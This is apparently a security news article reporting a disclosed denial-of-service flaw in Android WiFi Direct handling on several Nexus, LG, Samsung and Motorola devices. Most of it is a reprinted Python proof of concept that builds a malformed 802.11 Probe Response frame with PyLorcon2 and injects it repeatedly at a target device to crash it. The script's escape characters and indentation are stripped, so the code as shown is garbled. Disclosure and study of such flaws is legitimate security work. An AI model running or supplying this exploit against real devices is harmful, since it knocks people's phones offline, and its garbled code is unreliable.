Home Hacking Some Android Devices Vulnerable to DOS from WiFi Direct vulnerability

Some Android Devices Vulnerable to DOS from WiFi Direct vulnerability

4 min read
0
0

Some Android Devices Vulnerable to DOS from WiFi Direct vulnerability

Android Devices are vulnerable to DOS from WiFi Direct vulnerability discovered by Andres Blanco from the CoreLabs

An attacker could send a specially crafted 802.11 Probe Response frame causing the Dalvik subsystem to reboot because of an Unhandle Exception on WiFiMonitor class.

Vulnerable Packages include:

. Nexus 5 – Android 4.4.4
. Nexus 4 – Android 4.4.4
. LG D806 – Android 4.2.2
. Samsung SM-T310 – Android 4.2.2
. Motorola RAZR HD – Android 4.1.2

Coresec disclosed the vulnerability on Seclists, the bug is in the modified wpa_supplicant function which provides the interface between the wireless driver and the Android platform.

If the attacker sends a malformed wpa_supplicant value then Android’s WifiP2pDevice class throws an IllegalArgumentException, crashing the device: “a device name attribute with specific bytes generates a malformed supplicant event string that ends up throwing the IllegalArgumentException”.

Here is the POC example from seclist:

   This PoC was implemented using the open source library Lorcon
[2] and PyLorcon2 [3], a Python wrapper for the Lorcon library.
/-----
#!/usr/bin/env python
import sys
import time
import struct
import PyLorcon2
def get_probe_response(source, destination, channel):
frame = str()
frame += "x50x00"  # Frame Control
frame += "x00x00"  # Duration
frame += destination
frame += source
frame += source
frame += "x00x00"  # Sequence Control
frame += "x00x00x00x00x00x00x00x00"  # Timestamp
frame += "x64x00"  # Beacon Interval
frame += "x30x04"  # Capabilities Information
# SSID IE
frame += "x00"
frame += "x07"
frame += "DIRECT-"
# Supported Rates
frame += "x01"
frame += "x08"
frame += "x8Cx12x98x24xB0x48x60x6C"
# DS Parameter Set
frame += "x03"
frame += "x01"
frame += struct.pack("B", channel)
# P2P
frame += "xDD"
frame += "x27"
frame += "x50x6Fx9A"
frame += "x09"
# P2P Capabilities
frame += "x02" # ID
frame += "x02x00" # Length
frame += "x21x00"
# P2P Device Info
frame += "x0D" # ID
frame += "x1Bx00" # Length
frame += source
frame += "x01x88"
frame += "x00x0Ax00x50xF2x04x00x05"
frame += "x00"
frame += "x10x11"
frame += "x00x06"
frame += "fafaxFAxFA"
return frame
def str_to_mac(address):
return "".join(map(lambda i: chr(int(i, 16)), address.split(":")))
if __name__ == "__main__":
if len(sys.argv) != 3:
print "Usage:"
print "  poc.py  "
print "Example:"
print "  poc.py wlan0 00:11:22:33:44:55"
sys.exit(-1)
iface = sys.argv[1]
destination = str_to_mac(sys.argv[2])
context = PyLorcon2.Context(iface)
context.open_injmon()
channel = 1
source = str_to_mac("00:11:22:33:44:55")
frame = get_probe_response(source, destination, channel)
print "Injecting PoC."
for i in range(100):
context.send_bytes(frame)
time.sleep(0.100)
-----/
Load More Related Articles
Load More In Hacking

Leave a Reply

Your email address will not be published. Required fields are marked *

Check Also

New Cold Boot Attacks Can Evade Current Mitigations

New Cold Boot Attacks Can Evade Current Mitigations Many people tend to put laptops to ‘Sl…